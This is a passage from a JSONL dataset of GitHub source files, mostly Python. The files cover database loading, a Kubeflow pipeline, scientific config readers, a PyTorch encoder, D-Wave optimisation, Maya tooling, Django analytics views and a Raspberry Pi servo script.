\"\"\"Read xlsx file and insert to postgres database table\"\"\"\n # set table name from file name or argument\n table_name = table_name if table_name else parse_file_name_from_path(\n path=file_path, file_type=\".xlsx\")\n\n # get data frame\n df = get_xlsx_df(file_path)\n\n # use sqlalchemy engine\n with SQLAlchemyConnection().get_engine() as engine:\n # update table\n df_to_postgres(df, table_name, engine)\n\n\ndef update_tables_from_xlsx_directory(xlsx_files: list[str]) -> None:\n \"\"\"update tables from xlsx files\"\"\"\n # iterate through files paths and update tables\n for xlsx_path in xlsx_files:\n xlsx_to_postgres(xlsx_path)\n\n\ndef main() -> None:\n # load .env variables\n load_dotenv()\n\n # create logger\n logging.basicConfig(level=logging.INFO)\n\n\n # get dict from query\n psyco = PsycopgConnection(os.environ.get(\"DB_URL\"))\n # with psyco.get_cursor() as cursor:\n # cursor.execute(\"select * from sections\")\n # print(psyco.get_dict(cursor))\n\n # sections = process_get_sections_ids()\n # section = get_section_by_id(sections[0])\n # print(section)\n\n\n # with PsycopgConnection().get_cursor() as cursor:\n # cursor.execute(\"select * from sections\")\n # print(cursor.fetchall())\n # insert from csv\n # csv_file_path = get_abs_path(\"./csv_files/questions.csv\")\n # drop_table(psyco, \"dog_questionnaires\")\n\n # create_tables_from_file(psyco, get_abs_path(\"./create_tables.sql\"))\n\n # csv_to_postgres(csv_file_path)\n\n # csv_files = get_all_files_in_dir(\n # get_abs_path(\"./csv_files\"), file_type=\".csv\")\n # update_tables_from_csv_directory(csv_files)\n\n # xlsx_files = get_all_files_in_dir(path=get_abs_path(\"./xlsx_files\"),\n # file_type=\".xlsx\")\n # update_tables_from_xlsx_directory(xlsx_files)\n\n # [create_dog_answer(1, 1, 5)]\n # cmd = \"insert into dog_questionnaires (dog_id, question_id, answer_score) values (%s, %s, %s)\"\n # commands = [(cmd, (1, 1, 5)), (cmd, (2, 1, 5)),\n # (cmd, (3, 1, 5)), (\"select * from dogs\", tuple())]\n # cmds = [create_dog_answer(1, 1, 5), create_dog_answer(1, 1, 5)]\n # print(cmds)\n # PsycopgConnection().execute_command(*create_dog_answer(1, 1, 5))\n\n\n # for file in xlsx_files:\n # drop_table(parse_file_name_from_path(path=file, file_type=\".xlsx\"))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"johnnie172/dogs-behavioral-app","sub_path":"backend/data_base/db_actions.py","file_name":"db_actions.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15930988395","text":"import kfp\n@kfp.components.func_to_container_op\ndef print_func(param: int):\n print(str(param))\n@kfp.components.func_to_container_op\ndef list_func(param: int) -> list:\n return list(range(param))\n@kfp.dsl.pipeline(name='pipeline')\ndef pipeline(param: int):\n list_func_op = list_func(param)\n with kfp.dsl.ParallelFor(list_func_op.output) as param:\n print_func(param)\nif __name__ == '__main__':\n workflow_dict = kfp.compiler.Compiler()._create_workflow(pipeline)\n workflow_dict['metadata']['namespace'] = \"argo\"\n del workflow_dict['spec']['serviceAccountName']\n kfp.compiler.Compiler._write_workflow(workflow_dict, 'pipe.yaml')","repo_name":"shamiulshifat/kubeflow-practices","sub_path":"supabase-titanic/ARGO/test-codes/titanic-pipeline/argo_example.py","file_name":"argo_example.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36016787932","text":"import csv\nfrom pathlib import Path\nfrom datetime import datetime\n\nimport numpy as np\nfrom dateutil.parser import parse\nfrom intervaltree import IntervalTree\n\nimport astropy.units as u\nfrom astropy.table import QTable, Table\n\nfrom stixcore.config.data_types import EnergyChannel\n\n__all__ = ['read_energy_channels', 'read_subc_params']\n\nSCI_INDEX = None\nSCI_CHANNELS = {}\n\n\ndef float_def(value, default=np.inf):\n \"\"\"Parse the value into a float or return the default value.\n\n Parameters\n ----------\n value : `str`\n the value to parse\n default : `double`, optional\n default value to return in case of pasring errors, by default numpy.inf\n\n Returns\n -------\n `double`\n the parsed value\n \"\"\"\n try:\n return float(value)\n except ValueError:\n return default\n\n\ndef int_def(value, default=0):\n \"\"\"Parse the value into a int or return the default value.\n\n Parameters\n ----------\n value : `str`\n the value to parse\n default : `int`, optional\n default value to return in case of pasring errors, by default 0\n\n Returns\n -------\n `int`\n the parsed value\n \"\"\"\n try:\n return int(value)\n except ValueError:\n return default\n\n\ndef get_sci_channels(date):\n r\"\"\"\n Get the science energy channel info for given date\n\n Parameters\n ----------\n date : `datetime.datetime`\n\n Returns\n -------\n `astropy.table.QTable`\n Science Energy Channels\n \"\"\"\n global SCI_INDEX, SCI_CHANNELS\n\n # Cache index\n if SCI_INDEX is None:\n root = Path(__file__).parent.parent\n sci_chan_index_file = Path(root, *['config', 'data', 'common',\n 'detector', 'science_echan_index.csv'])\n sci_chan_index = read_energy_channel_index(sci_chan_index_file)\n SCI_INDEX = sci_chan_index\n\n sci_info = SCI_INDEX.at(date)\n if len(sci_info) == 0:\n raise ValueError(f'No Science Energy Channel file found for date {date}')\n elif len(sci_info) > 1:\n raise ValueError(f'Multiple Science Energy Channel file for date {date}')\n start_date, end_date, sci_echan_file = list(sci_info)[0]\n\n # Cache sci channels\n if sci_echan_file.name in SCI_CHANNELS:\n sci_echan_table = SCI_CHANNELS[sci_echan_file.name]\n else:\n sci_echan_table = read_sci_energy_channels(sci_echan_file)\n SCI_CHANNELS[sci_echan_file.name] = sci_echan_table\n\n return sci_echan_table\n\n\ndef read_energy_channel_index(echan_index_file):\n r\"\"\"\n Read science energy channel index file\n\n Parameters\n ----------\n echan_index_file: `str` or `pathlib.Path`\n\n Returns\n -------\n Science Energy Channel lookup\n \"\"\"\n echans = Table.read(echan_index_file)\n echan_it = IntervalTree()\n for i, start, end, file in echans.iterrows():\n date_start = parse(start)\n date_end = parse(end) if end != 'none' else datetime(2100, 1, 1)\n echan_it.addi(date_start, date_end, echan_index_file.parent / file)\n return echan_it\n\n\ndef read_sci_energy_channels(path):\n \"\"\"\n Read science energy channel definitions.\n\n Parameters\n ----------\n path : `pathlib.Path`\n path to the config file\n\n Returns\n -------\n `astropy.table.QTable`\n The science energy channels\n \"\"\"\n converters = {'Channel Number': int,\n 'Channel Edge': float,\n 'Energy Edge': float,\n 'Elower': float,\n 'Eupper': float,\n 'BinWidth': float,\n 'dE/E': float,\n 'QL channel': int}\n\n # tuples of (<match string>, '0')\n bad_data = (('max ADC', '0'), ('maxADC', '0'), ('n/a', '0'), ('', '0'))\n sci_chans = QTable.read(path, delimiter=',', data_start=24, header_start=21,\n converters=converters, fill_values=bad_data)\n # set units can't use list comp\n for col in ['Elower', 'Eupper', 'BinWidth']:\n sci_chans[col].unit = u.keV\n return sci_chans\n\n\ndef read_energy_channels(path):\n \"\"\"Read the energy channels from the configuration file.\n\n Parameters\n ----------\n path : `pathlib.Path`\n path to the config file\n\n Returns\n -------\n `dict`\n set of `EnergyChannel` accessible by index\n \"\"\"\n energy_channels = dict()\n\n with open(path, newline='') as csvfile:\n csvreader = csv.reader(csvfile, dialect='excel')\n for _ in range(24):\n next(csvreader)\n\n for row in csvreader:\n idx = int_def(row[0], -1)\n if idx == -1:\n continue\n energy_channels[idx] = EnergyChannel(\n channel_edge=int_def(row[1]),\n energy_edge=int_def(row[2]),\n e_lower=float_def(row[3]),\n e_upper=float_def(row[4]),\n bin_width=float_def(row[5]),\n dE_E=float_def(row[6])\n )\n\n return energy_channels\n\n\ndef read_subc_params(path):\n \"\"\"Read the configuration of the sub-collimator from the configuration file.\n\n Parameters\n ----------\n path : `pathlib.Path`\n path to the config file\n\n Returns\n -------\n `Table`\n params for all 32 sub-collimators\n \"\"\"\n return Table.read(path, format='ascii')\n","repo_name":"i4Ds/STIXCore","sub_path":"stixcore/config/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":5305,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"71586883681","text":"import json\n\nfrom airone.celery import app\nfrom job.models import Job\nfrom role.models import Role\n\n\n@app.task(bind=True)\ndef edit_role_referrals(self, job_id):\n job = Job.objects.get(id=job_id)\n\n if job.proceed_if_ready():\n job.update(job.STATUS[\"PROCESSING\"])\n params = json.loads(job.params)\n role = Role.objects.get(id=params[\"role_id\"])\n\n for entry in [x for x in role.get_referred_entries()]:\n entry.register_es()\n\n job.update(Job.STATUS[\"DONE\"])\n","repo_name":"dmm-com/airone","sub_path":"role/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"54"} +{"seq_id":"27657516150","text":"from collections import OrderedDict\n\nimport torch.nn as nn\n\nfrom .encoders import register\nfrom ..modules import *\n\n\n__all__ = ['convnet4', 'wide_convnet4']\n\n\nclass ConvBlock(Module):\n def __init__(self, in_channels, out_channels, bn_args):\n super(ConvBlock, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n\n self.conv = Conv2d(in_channels, out_channels, 3, 1, padding=1)\n self.bn = BatchNorm2d(out_channels, **bn_args)\n self.relu = nn.ReLU(inplace=True)\n self.pool = nn.MaxPool2d(2)\n\n def forward(self, x, params=None, episode=None):\n out = self.conv(x, get_child_dict(params, 'conv'))\n out = self.bn(out, get_child_dict(params, 'bn'), episode)\n out = self.pool(self.relu(out))\n return out\n\n\nclass ConvNet4(Module):\n def __init__(self, hid_dim, out_dim, bn_args):\n super(ConvNet4, self).__init__()\n self.hid_dim = hid_dim\n self.out_dim = out_dim\n\n episodic = bn_args.get('episodic') or []\n bn_args_ep, bn_args_no_ep = bn_args.copy(), bn_args.copy()\n bn_args_ep['episodic'] = True\n bn_args_no_ep['episodic'] = False\n bn_args_dict = dict()\n for i in [1, 2, 3, 4]:\n if 'conv%d' % i in episodic:\n bn_args_dict[i] = bn_args_ep\n else:\n bn_args_dict[i] = bn_args_no_ep\n\n self.encoder = Sequential(OrderedDict([\n ('conv1', ConvBlock(3, hid_dim, bn_args_dict[1])),\n ('conv2', ConvBlock(hid_dim, hid_dim, bn_args_dict[2])),\n ('conv3', ConvBlock(hid_dim, hid_dim, bn_args_dict[3])),\n ('conv4', ConvBlock(hid_dim, out_dim, bn_args_dict[4])),\n ]))\n\n def get_out_dim(self, scale=25):\n return self.out_dim * scale\n\n def forward(self, x, params=None, episode=None):\n out = self.encoder(x, get_child_dict(params, 'encoder'), episode)\n out = out.view(out.shape[0], -1)\n return out\n\n\n@register('convnet4')\ndef convnet4(bn_args=dict()):\n return ConvNet4(32, 32, bn_args)\n\n\n@register('wide-convnet4')\ndef wide_convnet4(bn_args=dict()):\n return ConvNet4(64, 64, bn_args)","repo_name":"fmu2/PyTorch-MAML","sub_path":"models/encoders/convnet4.py","file_name":"convnet4.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"54"} +{"seq_id":"23263185887","text":"\n\ndef convert_text_to_json_format(input_file_path, output_file_path):\n with open(input_file_path, 'r', encoding='utf-8') as infile, open(output_file_path, 'w', encoding='utf-8') as outfile:\n outfile.write(\"[\\n\")\n first = True\n\n while True:\n title = infile.readline().strip().replace('\"', '\\\\\"')\n if not title:\n break\n content = infile.readline().strip().replace('\"', '\\\\\"')\n\n # Skip the empty line between entries\n infile.readline()\n\n if not first:\n outfile.write(\",\\n\")\n else:\n first = False\n\n formatted_entry = f' {{\\n \"prompt\": \"{title}\",\\n \"completion\": \"\\'{content}\"\\n }}'\n outfile.write(formatted_entry)\n\n outfile.write(\"\\n]\")\n\n# Usage example\ninput_file_path = \"result/mediGate/medigate.txt\"\noutput_file_path = \"result/mediGate/medigate_convert.txt\"\nconvert_text_to_json_format(input_file_path, output_file_path)\nprint(\"Job Done!\")\n","repo_name":"harion01/naverAskCrawler","sub_path":"textConvertUtil.py","file_name":"textConvertUtil.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29730965403","text":"#!/usr/bin/python3\n\nimport csv\nimport numpy\n\nimport math\n\nimport dwavebinarycsp\nimport dwave.inspector\nimport dimod\nimport random\nfrom dwave.system import EmbeddingComposite, DWaveSampler, LeapHybridDQMSampler\nfrom dimod import DiscreteQuadraticModel\n\n############################################################\n## ETL / preprocessing of municipalities data\n\ncsvDataFile = open('kta_20210327-131158.csv')\ncsvReader = csv.reader(csvDataFile, delimiter=';')\n\nheaders = next(csvReader)\nheaders = [1,2,3,4,5,6,7,8,9,10,11,12,13,14]\ndata_num = 0;\ndata_elem = 0\ndata = numpy.array([1,2,3,4,5,6,7,8,9,10,11,12,13,14])\nxdata = numpy.array([[1,2,3,4,5,6,7,8,9,10,11,12,13,14]])\n\nfor row in csvReader:\n data[data_elem] = float(row[2])\n if(data_num == 0):\n headers[data_elem] = row[1]\n\n data_elem = data_elem + 1\n if(data_elem >= 14):\n xdata = numpy.append(xdata, [data], 0)\n data_elem = 0\n data_num += 1\n\nxdata = numpy.delete(xdata, [0], 0)\n\n# swap 1st and 3rd row with each other\nxdata[:,[0,2]] = xdata[:,[2,0]]\ntmp = headers[0]\nheaders[0] = headers[2]\nheaders[2] = tmp\n\nprint(headers)\nprint(xdata)\n\n# data is now numpy array, first element is the target value\n# next: discretizes other 13 fields into 1 bin indicator variables (smaller or larger than mean)\n\nddata = xdata\n\nmean = numpy.mean(xdata, 0)\nstdev = numpy.std(xdata, 0)\n\nrows, cols = xdata.shape\n\nprint(\"{} rows and {} cols of data\".format(rows, cols))\n\nprint(mean)\n\n######################################################################\n# normalize maximized first variable to be zero mean and unit variance\n\nfor row in range(rows):\n ddata[row][0] = (ddata[row][0] - mean[0]) / stdev[0];\n\n######################################################################\n# next calculates E[Y|x_j,x_i] used for optimization, we discretize variables\n# to N BINS: (2*sigma/(N/2) = tick length) except the first one which will be target variable\n\nBINS = 6\n\nfor row in range(rows):\n for col in range(1,cols):\n bin = int((xdata[row][col]-mean[col])/(2*stdev[col]/(BINS/2)))\n bin = bin + BINS\n if(bin >= BINS):\n bin = BINS-1\n if(bin <= 0):\n bin = 0\n ddata[row][col] = bin; # discrete variable between 0...(BIN-1)\n\nprint(ddata)\n\n# two variable model\nEY = {}\n\n# negative sign to maximize target (we minimize model energy)\nfor k in range(BINS):\n for l in range(BINS):\n for i in range(1, cols):\n for j in range(1, cols):\n EY[(i,k,j,l)] = 0.0\n for r in range(rows):\n if(ddata[r][i] == k and ddata[r][j] == l):\n EY[(i,k,j,l)] = EY[(i,k,j,l)] - ddata[r][0]/rows\n\n \n# single variable model \nEY2 = {}\n\nfor k in range(BINS):\n for i in range(1, cols):\n EY2[(i,k)] = 0.0\n for r in range(rows):\n if(ddata[r][i] == k):\n EY2[(i,k)] = EY2[(i,k)] - ddata[r][0]/rows\n\n\n# We minimize E[Y] so we use negative sign to actually maximize E[Y]\nprint(EY)\nprint(EY2)\n\n#####################################################################\n## D-WAVE sampler solver part\n\n# now transform E[Y|x_j,x_i] data to Ising model Jji, hj parameters\n# UPDATE: We use BQM model so we can use E[Y|x_j,x_i] values directly\n\ndqm = dimod.DiscreteQuadraticModel()\n\nfor p in range(1,len(headers)):\n dqm.add_variable(BINS, label=headers[p])\n\nfor p0 in range(1,len(headers)):\n v0 = headers[p0]\n\n EY2map = [0 for i in range(BINS)] \n\n for k in range(BINS):\n EY2map[k] = EY2[(p0,k)]\n\n print(v0) \n print(EY2map) \n \n dqm.set_linear(v0, EY2map)\n \n \n for p1 in range(1, p0):\n v1 = headers[p1]\n\n EYmap = {}\n for k in range(BINS):\n for l in range(BINS): # BINS\n EYmap[(k,l)] = EY[(p0,k,p1,l)]\n\n dqm.set_quadratic(v0, v1, EYmap)\n\n\nprint(\"Sampling model..\")\n\nsampler = LeapHybridDQMSampler()\n\nsampleset = sampler.sample_dqm(dqm, label='Municipalities best income')\n\n#sampler = EmbeddingComposite(DWaveSampler())\n#sampleset = sampler.sample(bqm,\n# chain_strength=4,\n# num_reads=1000,\n# label='BQM/Ising model test')\n\nbest_sample = sampleset.first.sample\nbest_energy = sampleset.first.energy\n\nprint(best_sample, headers[0], -best_energy)\n\n\n\n\n\n","repo_name":"cslr/kunnat","sub_path":"etl_data.py","file_name":"etl_data.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71936313763","text":"import maya.cmds\n\nimport mmSolver.logger\nimport mmSolver.api as mmapi\n\nLOG = mmSolver.logger.get_logger()\n\n\ndef create_marker_connections(cam):\n \"\"\"\n Create connections between the camera and markers.\n\n Adds a special lens attribute to the camera. This dynamic lens\n attribute will fan-out and connect to each Marker as needed.\n \"\"\"\n assert isinstance(cam, mmapi.Camera)\n\n # Get all markers under the camera.\n mkr_list = cam.get_marker_list()\n mkr_nodes = [mkr.get_node() for mkr in mkr_list]\n\n for mkr_node in mkr_nodes:\n dst = mkr_node + '.inLens'\n conns = (\n maya.cmds.listConnections(\n dst,\n source=True,\n destination=False,\n connections=True,\n plugs=True,\n )\n or []\n )\n src_list = conns[1::2]\n dst_list = conns[0::2]\n for src, dst in zip(src_list, dst_list):\n maya.cmds.disconnectAttr(src, dst)\n\n # Ensure Marker have connections to the camera lens.\n cam_shp = cam.get_shape_node()\n for mkr_node in mkr_nodes:\n src = cam_shp + '.outLens'\n dst = mkr_node + '.inLens'\n if not maya.cmds.isConnected(src, dst):\n maya.cmds.connectAttr(src, dst)\n return\n\n\ndef create_lens_on_camera(cam, force_create_new=None):\n \"\"\"\n Create a lens node and connect it to the given camera.\n\n :param cam: The camera to create a lens for.\n :type cam: mmSolver.api.Camera\n\n :param force_create_new: Should the function create a new lens\n node, even if a node already exists?\n :type force_create_new: bool or None\n\n :rtype: mmSolver.api.Lens\n \"\"\"\n assert isinstance(cam, mmapi.Camera)\n if force_create_new is None:\n force_create_new = False\n assert isinstance(force_create_new, bool)\n create_marker_connections(cam)\n lens = cam.get_lens()\n if lens is None or force_create_new is True:\n lens = mmapi.Lens().create_node()\n cam.set_lens(lens)\n return lens\n\n\ndef add_lens_layer_on_camera(cam):\n \"\"\"\n Create a new lens node as a 'layer' on the the given camera.\n\n :param cam: The camera to create a lens for.\n :type cam: mmSolver.api.Camera\n\n :rtype: mmSolver.api.Lens\n \"\"\"\n assert isinstance(cam, mmapi.Camera)\n create_marker_connections(cam)\n lens = None\n existing_lens = cam.get_lens()\n if existing_lens is None:\n lens = mmapi.Lens().create_node()\n cam.set_lens(lens)\n else:\n assert isinstance(cam, mmapi.Camera)\n lens = mmapi.Lens().create_node()\n cam.set_lens(lens)\n lens.set_input_lens(existing_lens)\n return lens\n","repo_name":"david-cattermole/mayaMatchMoveSolver","sub_path":"python/mmSolver/tools/createlens/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"54"} +{"seq_id":"568194023","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n\r\na = pd.Series([1, 2, 3, np.nan, 4])\r\ns = pd.Series(['A', 'B', 'C', 'Aaba', 'Baca', np.nan, 'CABA', 'dog', 'cat'])\r\nb = pd.date_range('20130101', periods=6)\r\nc = pd.DataFrame(np.random.randn(6, 4), index=b, columns=list('ABCD'))\r\ndf = pd.DataFrame(np.random.randn(10, 4))\r\npieces = [df[:3], df[3:7], df[7:]]\r\n# print(df)\r\n# print(pd.concat(pieces))\r\n\r\ndf = pd.DataFrame({'foo': ['one', 'one', 'one', 'two', 'two', 'two'],\r\n 'bar': ['A', 'B', 'C', 'A', 'B', 'C'],\r\n 'baz': [1, 2, 3, 4, 5, 6],\r\n 'zoo': ['x', 'y', 'z', 'q', 'w', 't']})\r\nd = df.pivot(index='foo', columns='bar', values=['baz', 'zoo'])\r\ne = df.stack()\r\nf = df.melt(id_vars='foo', value_vars=['bar', 'baz'])\r\n# pd.pivot_table(df, values='zoo', index='bar', columns='foo')\r\npd.cut(a, bins=3)\r\npd.factorize(a)\r\ns.str.len()\r\n# df.corr(method=\"spearman\")\r\n# df.expanding(min_periods=5).sum()\r\n# a = df.groupby(['foo', 'bar'])\r\nprint(pd.Timestamp.now())\r\n","repo_name":"okurumio/ML","sub_path":"pandas/pandas1.py","file_name":"pandas1.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31454106775","text":"import socket\ndef Main():\n host = '10.10.9.105'\n port = 5001\n client = True\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.connect((host, port))\n\n\n print(\"Connected\")\n # print(\"Welcome to Guess my number\")\n # print(\"I'm thinking of a number between 1 and 50. Please guess in few attempts possible.\")\n message = input(\"Enter your guess: Q for abort\")\n while message != 'Q':\n\n s.send(message.encode())\n data = s.recv(1024).decode()\n print(\"Received\" + str(data))\n val = data.split()\n if (val[0] == 'Correct' or val[0] == 'q'):\n s.send('Q'.encode())\n break\n message = input(\"-> \")\n s.close()\nif __name__ == '__main__':\n Main()","repo_name":"praneetha28/cnf","sub_path":"M9/clientupper.py","file_name":"clientupper.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2173526713","text":"from datetime import datetime\n\nfrom django.shortcuts import render\nfrom app.dal import app as appDAL\nfrom helpers import googleAnalytics\nfrom helpers import fbcampaigns\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\n\nGA_WEBSITE_VIEW_ID = \"ga:73399225\"\nGA_APP_VIEW_ID = \"ga:132813188\"\n\n# Create your views here.\n@login_required(login_url=settings.LOGIN_URL)\ndef get_ga_real_time_data(request):\n website_data = googleAnalytics.get_realtime_active_users(\n GA_WEBSITE_VIEW_ID)\n ga_app_data = googleAnalytics.get_realtime_active_users(GA_APP_VIEW_ID)\n\n total_website_users = website_data[\"totalsForAllResults\"][\"rt:activeUsers\"]\n website_geo_points = list()\n all_website_sources = list()\n if len(website_data[\"rows\"]) > 0:\n for tmpdata in website_data[\"rows\"]:\n if tmpdata[2] != '0.000000' and tmpdata[3] != '0.000000':\n website_geo_points.append({\n \"geo_coords\": [tmpdata[2], tmpdata[3]],\n \"city_name\": tmpdata[4],\n \"count\": tmpdata[5]\n })\n tmpdict = {\"device\": tmpdata[1],\n \"data\": {\n \"source\": tmpdata[0],\n \"latitude\": tmpdata[2],\n \"longitude\": tmpdata[3],\n \"city_name\": tmpdata[4],\n \"count\": tmpdata[5]\n }}\n all_website_sources.append(tmpdict)\n\n total_app_users = ga_app_data[\"totalsForAllResults\"][\"rt:activeUsers\"]\n app_geo_points = list()\n all_app_sources = list()\n if len(ga_app_data[\"rows\"]) > 0:\n for tmpdata in ga_app_data[\"rows\"]:\n if tmpdata[2] != '0.000000' and tmpdata[3] != '0.000000':\n app_geo_points.append({\n \"geo_coords\": [tmpdata[2], tmpdata[3]],\n \"city_name\": tmpdata[4],\n \"count\": tmpdata[5]\n })\n tmpdict = {\"device\": tmpdata[1],\n \"data\": {\n \"source\": tmpdata[0],\n \"latitude\": tmpdata[2],\n \"longitude\": tmpdata[3],\n \"city_name\": tmpdata[4],\n \"count\": tmpdata[5]\n }}\n all_app_sources.append(tmpdict)\n\n top_website_page_views = googleAnalytics.get_pageviews(GA_WEBSITE_VIEW_ID,\n datetime.now().strftime(\n \"%Y-%m-%d\"),\n datetime.now().strftime(\n \"%Y-%m-%d\"))\n\n # top_app_page_views = googleAnalytics.get_pageviews(GA_APP_VIEW_ID,\n # datetime.now().strftime(\n # \"%Y-%m-%d\"),\n # datetime.now().strftime(\n # \"%Y-%m-%d\"))\n\n orders_sold_per_minute = appDAL.get_orders_per_minutes(\n str(datetime.now().strftime(\"%Y-%m-%d\")) + \" 00:00:00\",\n str(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")),\n float(datetime.now().hour * datetime.now().minute))\n\n data_context = {\n \"website\": {\n \"total_users\": total_website_users,\n \"all_sources\": all_website_sources,\n \"top_page_views\": top_website_page_views,\n \"geo_points\": website_geo_points,\n },\n \"app\": {\n \"total_users\": total_app_users,\n \"all_sources\": all_app_sources,\n # \"top_page_views\": top_app_page_views,\n \"geo_points\": app_geo_points,\n },\n \"orders_sold_per_minute\": orders_sold_per_minute,\n }\n\n return render(request, \"app/realtime-data.html\", context=data_context)\n\n\n@login_required(login_url=settings.LOGIN_URL)\ndef get_ga_time_based_data(request):\n data_context = dict()\n if \"range\" in request.GET:\n datetime_range = request.GET.get(\"range\", None).split(\" - \")\n from_datetime = str(datetime.strptime(datetime_range[0].strip(),\n \"%Y-%m-%d %H:%M %p\").strftime(\n \"%Y-%m-%d %H:%M:%S\"))\n end_datetime = str(datetime.strptime(datetime_range[1].strip(),\n \"%Y-%m-%d %H:%M %p\").strftime(\n \"%Y-%m-%d %H:%M:%S\"))\n\n # fetching info now\n top_website_page_views = googleAnalytics.get_pageviews(\n GA_WEBSITE_VIEW_ID,\n datetime.now().strftime(\n \"%Y-%m-%d\"),\n datetime.now().strftime(\n \"%Y-%m-%d\"))\n google_analytics_website = googleAnalytics.get_insights(\n GA_WEBSITE_VIEW_ID,\n from_datetime[:10],\n end_datetime[:10])\n facebook_ads_data = fbcampaigns.insights(from_datetime[:10],\n end_datetime[:10])\n facebook_campaigns_data = fbcampaigns.campaigns_with_insights(\n from_datetime[:10], end_datetime[:10])\n top_retail_customers = appDAL.get_top_retail_customers(\n from_datetime,\n end_datetime,\n limit=10)\n top_products_sold = appDAL.get_top_products_sold(\n from_datetime,\n end_datetime,\n limit=10)\n top_customers_by_city = appDAL.get_top_customers_by_city(\n from_datetime,\n end_datetime,\n limit=10)\n top_sellers = appDAL.get_top_sellers(from_datetime,\n end_datetime,\n limit=10)\n top_sale_info = appDAL.get_top_sale_data(from_datetime,\n end_datetime,\n limit=10)\n\n website_converted_orders = list()\n # to get converted orders from website-google\n website_orders_by_campaigns = googleAnalytics.get_orders_by_campaigns(\n GA_WEBSITE_VIEW_ID, from_datetime[:10], end_datetime[:10],\n type=\"google\")\n for campaign_name, orders_list in website_orders_by_campaigns.items():\n converted_orders = appDAL.get_converted_orders(orders_list,\n from_datetime,\n end_datetime)\n website_converted_orders.append({\"type\": \"Google\",\n \"campaign_name\": campaign_name,\n \"converted_orders\": converted_orders})\n\n # to get converted orders from website-facebook\n website_orders_by_campaigns = googleAnalytics.get_orders_by_campaigns(\n GA_WEBSITE_VIEW_ID, from_datetime[:10], end_datetime[:10],\n type=\"facebook\")\n for campaign_name, orders_list in website_orders_by_campaigns.items():\n converted_orders = appDAL.get_converted_orders(orders_list,\n from_datetime,\n end_datetime)\n website_converted_orders.append({\"type\": \"Facebook\",\n \"campaign_name\": campaign_name,\n \"converted_orders\": converted_orders})\n\n orders_sold_per_minute = appDAL.get_orders_per_minutes(\n str(datetime.now().strftime(\"%Y-%m-%d\")) + \" 00:00:00\",\n str(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")),\n float(datetime.now().hour * datetime.now().minute))\n\n data_context = {\"data\": {\n \"top_retail_customers\": top_retail_customers,\n \"top_products_sold\": top_products_sold,\n \"top_customers_by_city\": top_customers_by_city,\n \"top_sellers\": top_sellers,\n \"orders_sold_per_minute\": orders_sold_per_minute,\n \"top_website_page_views\": top_website_page_views,\n \"google_analytics_website\": google_analytics_website,\n \"facebook_ads_data\": facebook_ads_data,\n \"facebook_campaigns_data\": facebook_campaigns_data,\n \"top_sale_info\": top_sale_info,\n \"website_converted_orders\": website_converted_orders,\n \"app_converted_orders\": website_converted_orders\n }\n }\n\n return render(request, \"app/data-info.html\", context=data_context)\n","repo_name":"arp19690/OC-Hackathon","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35606460835","text":"from threading import Thread\nimport time\nfrom time import sleep , perf_counter_ns # measures time in nano seconds\nimport speech_recognition as sr\nimport pyttsx3\nengine = pyttsx3.init()\nengine.setProperty('rate', 130)\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[3].id)\nengine.setProperty('volume',10)\nr=sr.Recognizer()\nmic=sr.Microphone(device_index=1)\n\nfrom board import SCL, SDA\nimport busio\nimport RPi.GPIO as GPIO\nfrom adafruit_motor import servo\nfrom adafruit_pca9685 import PCA9685\ni2c = busio.I2C(SCL, SDA)\npca = PCA9685(i2c)# Create a simple PCA9685 class instance.\npca.frequency = 50\nneckhor = servo.Servo(pca.channels[15])#head (30 to 160)\nneckver = servo.Servo(pca.channels[14])#head (0 to 110)\njaw = servo.Servo(pca.channels[13])#head (0 to 110)\n#oled = adafruit_ssd1306.SSD1306_I2C(128, 64, i2c, reset=reset_pin, addr=0x40)\n\n\n#GPIO SETUP\nchannel1 = 21 #right sensor pin number\nchannel2 = 20 #left sensor pin number\nchannel3 = 6 #front sebsor pin number\nchannel4 = 5 #down sensor pin number\nn=3\nGPIO.setmode(GPIO.BCM) #connection mode as BCM (\"Boardcom SOC channel\" change according to rasspbery's version number) \n\n#setting the sensors pins as inputs\nGPIO.setup(channel1, GPIO.IN )\nGPIO.setup(channel2, GPIO.IN )\nGPIO.setup(channel3, GPIO.IN )\nGPIO.setup(channel4, GPIO.IN )\n\n\n#giving the initial and normal angles for horizontal and vertical servoes\nnormal_angle_hor=100\nnormal_angle_ver=65\ncount_start=0 #initialize the counter\n\ndef order():\n global n\n global spoken\n t2 = Thread(target=move_jaw)\n t3 = Thread(target=say)\n spoken=\"can i help you\"\n t2.start()\n t3.start()\n 